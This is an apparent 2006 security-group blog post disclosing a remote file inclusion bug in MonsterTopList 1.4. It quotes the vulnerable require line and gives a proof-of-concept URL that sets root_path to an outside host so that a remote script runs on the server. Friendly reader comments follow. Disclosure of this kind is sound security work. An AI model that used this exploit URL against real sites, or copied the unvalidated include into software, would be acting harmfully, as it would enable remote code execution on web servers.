by r0t,der4444,cembo,VietMafia

Wednesday, April 12, 2006

MonsterTopList

=================================

MonsterTopList- Remote Code Execution bug
By: VietMafia
=================================
Developer site: http://www.monstertoplist.com/
Software: MTL 1.4
Risk: Moderate
Status: unpatched

=================================

This flaw is due to an input validation error in the "sources/functions.php"(line 8)
script that does not validate the "$root_path" variable,remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server

code:file sources/functions.php

line 8: require $root_path . "sources/func_output.php";



demo:

http://www.monstertoplist.com/demo.html



POC Exploit http://[target]/[path]/sources/functions.php?
root_path=http://unsecured-systems.com/forum/

5 Comments:

Blogger r0t told...

glad to see VietMafia on blog!

2:19 PM

 
Anonymous Anonymous told...

He had problems posting to the forum.. It seems that the IDS for the hoster has some problems and blocks some requests.

Maybe it will be fixed with upgrade of board, or maybe hoster has something wrong.

9:31 PM

 
Blogger r0t told...

hm... i did now about that probz.. i had made some posts in last days without probz..
If he want own account in this blog just let me now.
as i told in next days i will upgrade board , about hoster der4444 you know that is quit good .

10:38 PM

 
Anonymous Anonymous told...

r0t,

it's quite nice if i can have own account on this blog.i'm learning so i will try my best :)

VietMafia

6:12 PM

 
Blogger r0t told...

VietMafia, ok. invitation will be sent to your email that you had registred on board.

4:12 PM

 

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew